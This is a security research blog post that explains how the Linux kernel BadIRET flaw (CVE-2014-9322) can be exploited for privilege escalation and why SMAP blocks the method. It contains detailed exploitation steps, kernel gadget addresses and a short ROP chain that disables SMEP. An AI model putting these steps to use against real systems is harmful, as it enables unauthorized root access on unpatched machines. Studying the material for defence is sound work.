February 2, 2015 / Rafal Wojtczuk

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)


CVE-2014-9322 is described as follows:

arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
properly handle faults associated with the Stack Segment (SS) segment
register, which allows local users to gain privileges by triggering an IRET
instruction that leads to access to a GS Base address from the wrong space. 

It was fixed on 23rd November 2014 with this commit.

I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there.

All experiments were conducted on a Fedora 20 system running a 64-bit 3.11.10-301 kernel; all the discussion is 64-bit specific.

Short results summary:

  1. With the tested kernel, the vulnerability can be reliably exploited to achieve kernelmode arbitrary code execution.
  2. SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution.

    Digression: kernel, usermode, iret

    The vulnerability

    In a few cases, when the Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to the bad_iret function, which does

         /* So pretend we completed the iret and took the #GPF in user mode.*/
         pushq $0
         jmp general_protection

    As the comment explains, the subsequent code flow should be identical to the case when a general protection exception happens in user mode (just jump to the #GP handler). This works well for most of the exceptions that can be raised by iret, e.g. #GP.

    The problematic case is #SS exception. If a kernel is vulnerable (so, before kernel version 3.17.5) and has “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – “push” instruction generates a page fault that gets converted into double fault. I have not analysed this scenario; from now on, we focus on pre 3.16 kernel, with no “espfix”.

    The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. In comparison with e.g. #GP handler, the #SS exception handler does one extra swapgs instruction. In case you are not familiar with swapgs semantics, read the below paragraph, otherwise skip it.

    Digression: swapgs instruction

    When memory is accessed with gs segment prefix, like this:

    mov %gs:LOGICAL_ADDRESS, %eax

    the following actually happens:

    1. BASE_ADDRESS value is retrieved from the hidden part of the segment register
    2. memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced

    The base address is initially derived from Global Descriptor Table (or LDT). However, there are situations where GS segment base is changed on the fly, without involving GDT.

    Quoting SDM:

    “SWAPGS exchanges the current GS base register value with the value contained in MSR address C0000102H (IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction intended for use by system software. (…) The kernel can then use the GS prefix on normal memory references to access [per-cpu] kernel data structures.”

    For each CPU, Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure address. Therefore, the usual pattern of e.g. syscall handler is:

    1. swapgs (now the gs base points to kernel memory)
    2. access per-cpu kernel data structures via memory instructions with gs prefix
    3. swapgs (it undoes the result of the previous swapgs, gs base points to usermode memory)
    4. return to usermode

    Naturally, kernel code must ensure that whenever it wants to access percpu data with gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is odd (so that gs base points to kernel memory).
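    The parity rule can be made concrete with a toy model. This is only a sketch: the struct and function names are mine, and nothing here touches real hardware state.

```c
#include <stdint.h>

/* Toy model of one CPU's GS state (hypothetical names, no real MSR access). */
struct cpu_model {
    uint64_t gs_base;         /* base used by %gs-prefixed memory accesses */
    uint64_t kernel_gs_base;  /* value held in IA32_KERNEL_GS_BASE */
};

/* SWAPGS: exchange the active GS base with IA32_KERNEL_GS_BASE. */
void swapgs(struct cpu_model *cpu)
{
    uint64_t tmp = cpu->gs_base;
    cpu->gs_base = cpu->kernel_gs_base;
    cpu->kernel_gs_base = tmp;
}

/* Linear address dereferenced by "mov %gs:LOGICAL_ADDRESS, ...". */
uint64_t gs_linear(uint64_t gs_base, uint64_t logical)
{
    return gs_base + logical;
}

/* GS base in effect after `count` swapgs executions, starting from the
   state at entry from usermode (gs base = user value). */
uint64_t gs_base_after(uint64_t user_base, uint64_t percpu_base, unsigned count)
{
    struct cpu_model cpu = { user_base, percpu_base };
    while (count--)
        swapgs(&cpu);
    return cpu.gs_base;
}
```

    With an odd count, gs_base_after() returns the per-cpu base; with an even count it returns the usermode value, so any %gs-prefixed access made by kernel code in that state goes through a base the user chose.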

    Triggering the vulnerability

    By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, kernel will try to access important data structures with a wrong gs base, controllable by the user.

    When is #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of iret instruction, it says:

     64-Bit Mode Exceptions:
     If an attempt to pop a value off the stack violates the SS limit.
     If an attempt to pop a value off the stack causes a non-canonical address
     to be referenced.

    None of these conditions can be forced to happen in kernel mode. However, the pseudocode for iret (in the same SDM) shows another case: when the segment defined by the return frame is not present:

    IF stack segment is not present
    THEN #SS(SS selector); FI;

    So, in usermode, we need to set ss register to something not present. It is not straightforward: we cannot just use

    mov $nonpresent_segment_selector, %eax
    mov %ax, %ss

    as the latter instruction will generate #GP. Setting the ss via debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on 64-bit systems (it might work on 32-bit, though). The solution is:

    1. thread A: create a custom segment X in LDT via sys_modify_ldt syscall
    2. thread B: ss:=X_selector
    3. thread A: invalidate X via sys_modify_ldt
    4. thread B: wait for hardware interrupt

    The reason why one needs two threads (both in the same process) is that the return from the syscall (including sys_modify_ldt) is done via sysret instruction that hardcodes the ss value. If we invalidated X in the same thread that did “ss:=X instruction”, ss would be undone.

    Running the above code results in kernel panic. In order to do something more meaningful, we will need to control usermode gs base; it can be set via arch_prctl(ARCH_SET_GS) syscall.

    Achieving write primitive

    If we run the above code, then #SS handler runs fine (meaning: it will not touch memory at gs base), returns into bad_iret, that in turn jumps to #GP exception handler. This runs fine for a while, and then calls the following function:

    289 dotraplinkage void
    290 do_general_protection(struct pt_regs *regs, long error_code)
    291 {
    292         struct task_struct *tsk;
    306         tsk = current;
    307         if (!user_mode(regs)) {
                    ... it is not reached
    317         }
    319         tsk->thread.error_code = error_code;
    320         tsk->thread.trap_nr = X86_TRAP_GP;
    322         if (show_unhandled_signals && unhandled_signal(tsk, SIGSEGV) &&
    323                         printk_ratelimit()) {
    324                 pr_info("%s[%d] general protection ip:%lx sp:%lx error:%lx",
    325                         tsk->comm, task_pid_nr(tsk),
    326                         regs->ip, regs->sp, error_code);
    327                 print_vma_addr(" in ", regs->ip);
    328                 pr_cont("\n");
    329         }
    331         force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk);
    332 exit:
    333         exception_exit(prev_state);
    334 }

    It is far from obvious from the C code, but the assignment to tsk from the current macro uses a memory read with gs prefix. Line 306 is actually:

    0xffffffff8164b79d :	mov    %gs:0xc780,%rbx

    This gets interesting. We control the “current” pointer, that points to the giant data structure describing the whole Linux process. Particularly, the lines

    319         tsk->thread.error_code = error_code;
    320         tsk->thread.trap_nr = X86_TRAP_GP;

    are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are 0 and 0xd constants, respectively), but this should not be a problem. Game over?

    Not quite. Say, we want to overwrite some important kernel data structure at X. If we do the following steps:

    1. prepare usermode memory at FAKE_PERCPU, and set gs base to it
    2. Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET= X – offsetof(struct task_struct, thread.error_code)
    3. trigger the vulnerability
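    The pointer arithmetic in step 2 can be sketched as follows. The struct below is a hypothetical stand-in: the real task_struct layout depends on the kernel build, and the padding size is made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the kernel's task_struct; the real one is much
   larger and its offsets are build-specific. */
struct mock_thread {
    unsigned long trap_nr;
    unsigned long error_code;
};
struct mock_task {
    char other_fields[0x400];   /* placeholder padding, not a real offset */
    struct mock_thread thread;
};

/* Value to store at FAKE_PERCPU+0xc780 so that the address of
   tsk->thread.error_code equals the target X. */
uintptr_t fake_current_for(uintptr_t target)
{
    return target - offsetof(struct mock_task, thread.error_code);
}

/* Address that "tsk->thread.error_code = error_code" would write to. */
uintptr_t error_code_address(uintptr_t tsk)
{
    return tsk + offsetof(struct mock_task, thread.error_code);
}
```

    For any X, error_code_address(fake_current_for(X)) gives X back, which is all that step 2 relies on.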

    Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. unhandled_signal() function dereferences a pointer from task_struct. We have no control what lies beyond X, and the result will be a page fault in kernel.

    How can we cope with this? Options:

    1. Do nothing. Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process, and tries to continue (while Windows bluescreens immediately).
       This does not work – the result is massive kernel data corruption and whole system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes.
    2. Use the “tsk->thread.error_code = error_code” write to overwrite IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before.
       This does not work, either, for two reasons:
       • Linux makes IDT read-only (bravo!)
       • even if IDT was writeable, we do not control the overwrite value – it is 0 or 0xd. If we overwrite the top DWORDS of IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of these two addresses being a useful stack pivot sequence are negligible.
    3. We can try a race. Say, “tsk->thread.error_code = error_code” write facilitates code execution, e.g. allows to control code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm.
       I tried this approach a couple of times, with no luck; perhaps with different vulnerability the timings would be different and it would work better.
    4. Throw in the towel on the “tsk->thread.error_code = error_code” write.

    With some disgust, we will follow the last option. We will point “current” to usermode location, setting the pointers in it so that the read dereferences on them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences.

    Achieving write primitive continued, aka life after do_general_protection

    Our next chance is the function called by do_general_protection():

    int force_sig_info(int sig, struct siginfo *info, struct task_struct *t)
    {
            unsigned long int flags;
            int ret, blocked, ignored;
            struct k_sigaction *action;
            spin_lock_irqsave(&t->sighand->siglock, flags);
            action = &t->sighand->action[sig-1];
            ignored = action->sa.sa_handler == SIG_IGN;
            blocked = sigismember(&t->blocked, sig);
            if (blocked || ignored) {
                    action->sa.sa_handler = SIG_DFL;
                    if (blocked) {
                            sigdelset(&t->blocked, sig);
                    }
            }
            if (action->sa.sa_handler == SIG_DFL)
                    t->signal->flags &= ~SIGNAL_UNKILLABLE;
            ret = specific_send_sig_info(sig, info, t);
            spin_unlock_irqrestore(&t->sighand->siglock, flags);
            return ret;
    }

    The field “sighand” in task_struct is a pointer, that we can set to an arbitrary value. It means that the

    action = &t->sighand->action[sig-1];
    action->sa.sa_handler = SIG_DFL;

    lines are another chance for write primitive to an arbitrary location. Again, we do not control the write value – it is the constant SIG_DFL, equal to 0.

    This finally works, hurray! With a little twist, though. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly sighand field in it) so that X = address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is a line

    spin_lock_irqsave(&t->sighand->siglock, flags);

    As t->sighand->siglock is at constant offset from t->sighand->action[sig-1].sa.sa_handler, it means kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose content we do not control. What happens then?

    There are two possibilities:

    1. memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. Final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good.
    2. memory at X+SPINLOCK looks like a locked spinlock. spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react.

    This is worrying. In order to bypass this, we will need another assumption – we will need to know we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we will set X to be in kernel .data section. We will do the following:
    • initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE
    • force_sig_info() will hang in spin_lock_irqsave
    • at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE
    • spin_lock_irqsave will return.
    • force_sig_info() will reload t->sighand, and perform the desired write.
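    The key point of this sequence is that the lock address is computed from t->sighand once, while the handler write reads t->sighand again. A single-threaded replay with mock structures illustrates it; all names below are hypothetical, the structures are drastically simplified, and the "other thread" steps are simply inlined where they would happen.

```c
/* Hypothetical, heavily simplified stand-ins for the kernel structures. */
struct mock_sighand {
    long sa_handler;   /* models action[sig-1].sa.sa_handler */
    int  siglock;      /* models siglock: 1 = locked, 0 = unlocked */
};
struct sim_task {
    struct mock_sighand *sighand;
};

/* Replays the five steps above in order, in one thread. */
void replay_retarget(struct mock_sighand *decoy, struct mock_sighand *target)
{
    struct sim_task t = { decoy };
    volatile int *lock;

    decoy->siglock = 1;             /* SPINLOCK_USERMODE starts out locked */

    /* force_sig_info(): &t->sighand->siglock is evaluated here, once. */
    lock = &t.sighand->siglock;

    /* "Other thread": retarget t->sighand, then release the lock. */
    t.sighand = target;
    decoy->siglock = 0;

    while (*lock)                   /* the spin now terminates */
        ;

    /* force_sig_info() reads t->sighand again for the handler write. */
    t.sighand->sa_handler = 0;      /* SIG_DFL */
}
```

    After replay_retarget(&decoy, &target), only target.sa_handler has been zeroed; the decoy structure that supplied the lock keeps its handler value.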

    A careful reader is encouraged to enquire why we cannot use the latter approach in the case X+SPINLOCK is initially unlocked.

    This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because the usermode ss value on the stack still refers to a nonpresent segment). But this time, the extra swapgs instruction in #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable.

    Digression: SMEP

    SMEP is a feature of Intel processors, starting from 3rd generation of Core processor. If the SMEP bit is set in CR4, CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available.

    Achieving code execution

    The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled?

    Overwriting a kernel code pointer would not work. We can either nullify its top bytes – but then the resulting address would be in usermode, and SMEP will prevent dereference of this pointer. Alternatively, we can nullify a few low bytes, but then the chances that the resulting pointer would point to a useful stack pivot sequence are low.

    What we need is a kernel pointer P to structure X, that contains code pointers. We can overwrite top bytes of P so that the resulting address is in usermode, and P->code_pointer_in_x() call will jump to a location that we can choose.

    I am not sure what the best object to attack is. For my experiments, I chose the kernel proc_root variable. It is a structure of type

    struct proc_dir_entry {
            const struct inode_operations *proc_iops;
            const struct file_operations *proc_fops;
            struct proc_dir_entry *next, *parent, *subdir;
            u8 namelen;
            char name[];
    };

    This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called:

    struct inode_operations {
            struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int);
            void * (*follow_link) (struct dentry *, struct nameidata *);
            ...many more...
            int (*update_time)(struct inode *, struct timespec *, int);
    } ____cacheline_aligned;

    proc_root resides in the kernel data section. It means that the exploit needs to know its address. This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline; along with tens of offsets required to build FAKE_CURRENT.

    So, we will overwrite proc_root.subdir so that it becomes a pointer to a controlled struct proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdir be 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to:

    1. map 16MB of memory at address 4096
    2. fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to usermode address FAKE_IOPS, and name field being “A” string.
    3. configure the exploit to overwrite the top 5 bytes of proc_root.subdir
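    The effect of step 3 on the pointer value can be modelled on a byte buffer. This is a sketch under my own assumptions: that the 8-byte zero write is aimed 3 bytes into the pointer (so the remaining 3 zero bytes spill into whatever follows it), that the host is little-endian, and that the sample pointer value used in the note below is made up.

```c
#include <stdint.h>
#include <string.h>

#define LOW_MAP_START 4096ULL                 /* step 1: mapping starts here */
#define LOW_MAP_SIZE  (16ULL * 1024 * 1024)   /* step 1: 16MB */

/* Models an 8-byte zero write that starts 3 bytes into a little-endian
   64-bit pointer: bytes 3..7 (the top five) become zero. */
uint64_t zero_top_five_bytes(uint64_t pointer_value)
{
    unsigned char mem[16];
    uint64_t result;

    memcpy(mem, &pointer_value, sizeof pointer_value);
    memset(mem + 8, 0xAA, 8);   /* neighbouring field, arbitrary content */
    memset(mem + 3, 0, 8);      /* the "8 zeroes" write primitive */
    memcpy(&result, mem, sizeof result);
    return result;
}

/* Does the resulting address fall inside the region mapped in step 1? */
int lands_in_low_mapping(uint64_t addr)
{
    return addr >= LOW_MAP_START && addr < LOW_MAP_START + LOW_MAP_SIZE;
}
```

    For a hypothetical value such as 0xffff880012345678, zero_top_five_bytes() yields 0x345678, which lands inside the mapped region; a result of 0 would not.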

    Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info() proc_root.subdir will point to controlled usermode memory. When our process calls open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to?

    If you think the answer is “to our shellcode”, go back and read again.

    We will need to point FAKE_IOPS pointers to a stack pivot sequence. This again assumes the knowledge of the precise version of the kernel running. The usual “xchg %esp, %eax; ret” code sequence (it is two bytes only, 94 c3, found at 0xffffffff8119f1ed in case of the tested kernel), works very well for 64bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32bit registers, thus clearing the high 32bits of %rsp, and landing %rsp in usermode memory. In the worst case, we may need to allocate the low 4GB of virtual memory and fill it with rop chain.

    In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed:

    1. %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax)
    2. %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax

    In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the rop chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of FAKE_IOPS pointers.

    In the second case, the %rsp will be assigned the low 32bits of the call target, so 0x8119f1ed. We need to prepare the rop chain at this address as well.

    To sum up, as the %rax value has one of two known values at the moment of the entry to the stack pivot sequence, we do not need to fill the whole 4G with rop chain, just the above two addresses.
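    The register arithmetic behind the pivot can be checked with a small model. It is only a sketch: the struct and function names are mine, and the kernel stack value used in the note below is a made-up placeholder.

```c
#include <stdint.h>

/* Minimal register file for the model (hypothetical). */
struct regs {
    uint64_t rax;
    uint64_t rsp;
};

/* "xchg %esp, %eax" in 64-bit mode: each 32-bit register write
   zero-extends into the full 64-bit register. */
void xchg_esp_eax(struct regs *r)
{
    uint32_t eax = (uint32_t)r->rax;
    uint32_t esp = (uint32_t)r->rsp;

    r->rax = esp;   /* high 32 bits of %rax become 0 */
    r->rsp = eax;   /* high 32 bits of %rsp become 0 */
}

/* %rsp as seen by the "ret" that follows the xchg. */
uint64_t rsp_after_pivot(uint64_t rax, uint64_t rsp)
{
    struct regs r = { rax, rsp };

    xchg_esp_eax(&r);
    return r.rsp;
}
```

    With %rax equal to the call target 0xffffffff8119f1ed (the second case), rsp_after_pivot() returns 0x8119f1ed regardless of the old stack pointer, matching the address where the rop chain has to be prepared.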

    The ROP chain itself is straightforward, shown for the second case:

    unsigned long *stack = (unsigned long *)0x8119f1edUL;
    *stack++ = 0xffffffff81307bcdULL;  // pop rdi, ret
    *stack++ = 0x407e0;                // cr4 with smep bit cleared
    *stack++ = 0xffffffff8104c394ULL;  // mov rdi, cr4; pop %rbp; ret
    *stack++ = 0xaabbccdd;             // placeholder for rbp


    Digression: SMAP

    SMAP is a feature of Intel processors, starting from 5th generation of Core processor. If the SMAP bit is set in CR4, CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available. A test kernel module (run on a system with Core-M 5Y10a CPU) that tries to access usermode memory crashes with:

    [  314.099024] running with cr4=0x3407e0
    [  389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000
    [  389.885455] IP: [ffffffffa0832029] test_write_proc+0x29/0x50 [smaptest]
    [  389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867
    [  389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b 

    As we can see, although the usermode page is present, access to it throws a page fault.

    Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (that was tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in case of Linux, access to usermode is performed explicitly, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in the exception handler, so it is more difficult to adjust all the drivers in all required places to work properly with SMAP.
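    The cr4 values quoted in this post can be decoded with two bit tests. A minimal sketch; the helper names are mine. SMEP is bit 20 and SMAP is bit 21 of CR4.

```c
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)   /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21)   /* Supervisor Mode Access Prevention */

int cr4_has_smep(uint64_t cr4)
{
    return (cr4 & CR4_SMEP) != 0;
}

int cr4_has_smap(uint64_t cr4)
{
    return (cr4 & CR4_SMAP) != 0;
}
```

    Applied to the values above: 0x3407e0 (the Linux test machine) has both bits set, 0x1506f8 (the Windows preview) has SMEP only, and 0x407e0 (the value loaded by the rop chain) has neither.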

    SMAP to the rescue!

    The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – CPU will refuse to read malicious data from usermode.

    What we could do is to craft all the required data structures, and then copy them to the kernel. For instance if one does

    write(pipe_filedescriptor, evil_data, ...

    then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP.

    However, there is one more hurdle – remember, we need to set usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used arch_prctl(ARCH_SET_GS) syscall, that is implemented in the following way in the kernel:

    long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
             int ret = 0; 
             int doit = task == current;
             int cpu;
             switch (code) { 
             case ARCH_SET_GS:
                     if (addr >= TASK_SIZE_OF(task))
                             return -EPERM; 
                     ... honour the request otherwise

    Houston, we have a problem – we cannot use this API to set gs base above the end of usermode memory!
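    The range check is easy to model outside the kernel. The sketch below uses my own names, and assumes the usual x86-64 user address limit of that kernel generation, (1 << 47) minus one page; the real TASK_SIZE_OF(task) also depends on whether the task is a 32-bit one.

```c
#include <errno.h>
#include <stdint.h>

/* Assumption: 64-bit task, user address space limit of (1 << 47) - 4096. */
#define MODEL_TASK_SIZE ((1ULL << 47) - 4096)

/* Mirrors only the ARCH_SET_GS address check quoted above. */
long model_set_gs_check(uint64_t addr)
{
    if (addr >= MODEL_TASK_SIZE)
        return -EPERM;   /* kernel-range bases are refused */
    return 0;            /* request would be honoured */
}
```

    Any address in the kernel half of the address space, for example a guessed pipe buffer location, fails this check, while ordinary usermode addresses pass.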

    Recent CPUs feature wrgsbase instruction, that sets the gs base directly. This is a nonprivileged instruction, but needs to be enabled by the kernel by setting the FSGSBASE bit (no 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction.

    On 64bits, nonsystem entries in GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so, no chance to set up a segment with base address in kernel space.
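    To see why the base cannot exceed 4G-1, it helps to extract it from the 8-byte descriptor format. A sketch with a helper name of my choosing; the descriptor is treated as one little-endian 64-bit value.

```c
#include <stdint.h>

/* Base field of an 8-byte code/data segment descriptor:
   bits 16..39 hold base[23:0], bits 56..63 hold base[31:24]. */
uint32_t descriptor_base(uint64_t descriptor)
{
    uint32_t low  = (uint32_t)((descriptor >> 16) & 0xffffff);
    uint32_t high = (uint32_t)((descriptor >> 56) & 0xff);

    return (high << 24) | low;
}
```

    Even with every bit of the descriptor set, descriptor_base() returns 0xffffffff: there are only 32 base bits to work with.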

    So, unless I missed another way to set usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322.
